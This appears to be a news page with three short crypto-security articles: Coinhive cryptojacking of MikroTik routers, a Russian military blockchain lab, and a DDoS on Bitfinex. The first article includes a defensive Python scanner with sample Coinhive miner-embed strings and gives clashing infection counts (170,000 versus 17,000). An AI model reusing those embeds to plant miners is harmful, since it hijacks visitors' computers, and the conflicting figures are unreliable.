
Attacker Installs Crypto Mining Malware on Over 170,000 Devices

More than 170,000 devices in Brazil were targeted in a cryptojacking attack last month.

According to a blog post published by security firm Trustwave, a wide-scale cyberattack was launched on MikroTik routers late last month. The effort led to the installation of the Coinhive mining software in a “mass” infection of more than 17,000 devices.

Trustwave security researcher Simon Kenin wrote that all of the devices used “the same sitekey,” indicating that one entity reaped the mined tokens from all of the devices.

He wrote:

“This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale.”

According to a previous post by Trustwave, also co-authored by Kenin, Coinhive gained traction in 2017 as a service that claimed to provide monetizing solutions for websites without using any advertisements. Instead, site owners were to embed JavaScript code that would take hold of the central processing unit (CPU) power of site visitors to mine the cryptocurrency monero.

However, mining reportedly ended up costing site visitors up to 99 percent of their CPU processing power, leading to further issues for consumers as their devices generated more heat and used up large amounts of electricity.
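As an added illustration (not code from Trustwave's post or from this article), the sketch below shows how a defender could scan captured HTTP response bodies for the Coinhive embed and group hosts by the site key passed to the miner constructor, the same correlation that pointed to a single operator. The host addresses, key values and page bodies are constructed samples.

```python
import re
from collections import defaultdict

# Coinhive embeds load a script from the service and construct a miner with the
# account's site key as first argument, e.g. new CoinHive.Anonymous('KEY').
LOADER_RE = re.compile(r"""<script[^>]+src=['"][^'"]*coinhive[^'"]*\.js""", re.I)
SITEKEY_RE = re.compile(r"""CoinHive\.\w+\(\s*['"]([A-Za-z0-9]+)['"]""")

# Constructed sample: host -> HTTP response body observed for that host.
LOADER = '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
SAMPLE = {
    "192.0.2.10": LOADER + "<script>new CoinHive.Anonymous('CONSTRUCTEDKEY0001')</script>",
    "192.0.2.11": LOADER + "<script>new CoinHive.Anonymous('CONSTRUCTEDKEY0001')</script>",
    "192.0.2.12": LOADER + "<script>new CoinHive.User('CONSTRUCTEDKEY0002', 'u')</script>",
    "192.0.2.13": "<html><body>router login</body></html>",
    "192.0.2.14": LOADER + "<script>/* key built at runtime */</script>",
}

def scan_body(body):
    """Return (loader_present, set_of_site_keys) for one response body."""
    return bool(LOADER_RE.search(body)), set(SITEKEY_RE.findall(body))

def group_by_sitekey(responses):
    """Map each site key to the sorted list of hosts whose pages embed it."""
    hosts_by_key = defaultdict(set)
    for host, body in responses.items():
        for key in scan_body(body)[1]:
            hosts_by_key[key].add(host)
    return {key: sorted(hosts) for key, hosts in hosts_by_key.items()}

def shared_keys(responses, min_hosts=2):
    """Site keys seen on at least min_hosts hosts: one party collects from all."""
    grouped = group_by_sitekey(responses)
    return {k: h for k, h in grouped.items() if len(h) >= min_hosts}

def loader_only_hosts(responses):
    """Hosts that load the miner script but expose no literal key (review by hand)."""
    flagged = []
    for host, body in responses.items():
        loader, keys = scan_body(body)
        if loader and not keys:
            flagged.append(host)
    return sorted(flagged)

if __name__ == "__main__":
    print("shared keys:", shared_keys(SAMPLE))
    print("loader without key:", loader_only_hosts(SAMPLE))
```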

Trustwave has since released a detection tool to block the mining malware, and as Kenin explains in his most recent post, readers should heed his “warning call” and patch any MikroTik devices “as soon as possible,” emphasizing that the severity of the attacks could reach “hundreds of thousands” of consumers around the globe.

Kenin also reports that illicit cryptocurrency mining operations such as these are “a trend we’ve been seeing a lot of over the last three years, as attackers shift from ransomware into the world of miners.”

Such sentiments are being echoed by other cybersecurity firms such as Skybox Security, which also reported in its 2018 mid-year update that, among cybercriminals, crypto mining now accounted for 32 percent of all cyberattacks, with ransomware making up 8 percent.


The leader in blockchain news, CoinDesk is a media outlet that strives for the highest journalistic standards and abides by a strict set of editorial policies. CoinDesk is an independent operating subsidiary of Digital Currency Group, which invests in cryptocurrencies and blockchain startups.


The Russian Military Is Building a Blockchain Research Lab

The Russian Ministry of Defense is launching a research lab to analyze how blockchain technology can be used to mitigate cybersecurity attacks, a local newspaper reported Friday.

The nation’s military technology accelerator, referred to as the ERA, is launching a special scientific lab to determine whether blockchain technology can be used to identify cyber attacks and protect critical infrastructure, according to Russian daily Izvestia.

The newspaper reported that research has already begun to explore possible applications for blockchain technology, though the lab itself is still being developed.

One of the priorities at ERA is the development of an intelligent system to detect and prevent cyber attacks on critical information. To that end, the organization has formed a team of information security specialists.

Alexei Malanov, an antivirus expert at Kaspersky Lab, a cybersecurity firm based in Moscow, told the newspaper that blockchain-based platforms can make it more difficult to hide traces of cyber attacks.

He explained that online intruders often clean up access logs on devices to hide traces of unauthorized access to the device. But, by using a distributed ledger, the risk of this happening is minimized.

German Klimenko, a former technology advisor to Russian President Vladimir Putin, similarly said that work on blockchain studies has been “useful” for the cybersecurity industry in the nation.

The lab, which is being built in the Russian coastal town of Anapa, will ultimately fall under the General Staff of the Armed Forces of the Russian Federation’s Eighth Directorate, which likewise focuses on information security.


Bitfinex Recovers from Cyber Attack to Resume Trading

The world’s fourth largest crypto exchange by trade volume, Bitfinex, suffered a cyber-attack yesterday that halted services and prevented trading temporarily.

The Hong Kong-headquartered exchange, which has handled $430 million in trade in the past 24 hours according to, went offline for a few hours with what it determined as unscheduled maintenance. It was subsequently revealed that the servers were the target of a distributed denial of service (DDoS) attack, which overloaded them with spurious traffic, causing the website and trading platform to shut down temporarily.

The status monitoring systems for Bitfinex reported that:

“The cause of the outage has been identified. A DDoS attack was launched soon after we restarted operations. The previous outage was caused by issues with one of our infrastructure providers. While the platform was recovering, the attack caused extreme load on the servers. We are adjusting the DDoS protection measures to fend off the attack and be able to relaunch.”

These types of attacks are not designed to steal currency but to disrupt services. Bitfinex quickly recovered from the incursion and trading resumed within a couple of hours.

Traders and investors had every reason to be concerned, since Bitfinex lost almost 120,000 Bitcoins to hackers back in 2016. In June 2017 the exchange also reported being the victim of cyber-attacks, so it is quite familiar with them.

The ongoing saga with Tether is also a cause for concern with Bitfinex and those that use the platform. There have been fears that the company would close due to links with USDT and an ongoing investigation by the Commodity Futures Trading Commission, which subpoenaed the exchange in January. Since then the exchange has been operating as normal, even though it still holds the largest amount of Tether, which is currently responsible for over 17% of all Bitcoin volumes.

Security is a major headache for exchanges, which are now the modern version of a bank, which of course can be robbed. Several have fallen victim this year, with the largest hack being Coincheck at the beginning of the year.

The advice is always the same: do not hold any significant amount of crypto on exchanges, no matter how safe you think they are. Wallets and cold storage are far safer alternatives; however, even they are not completely infallible.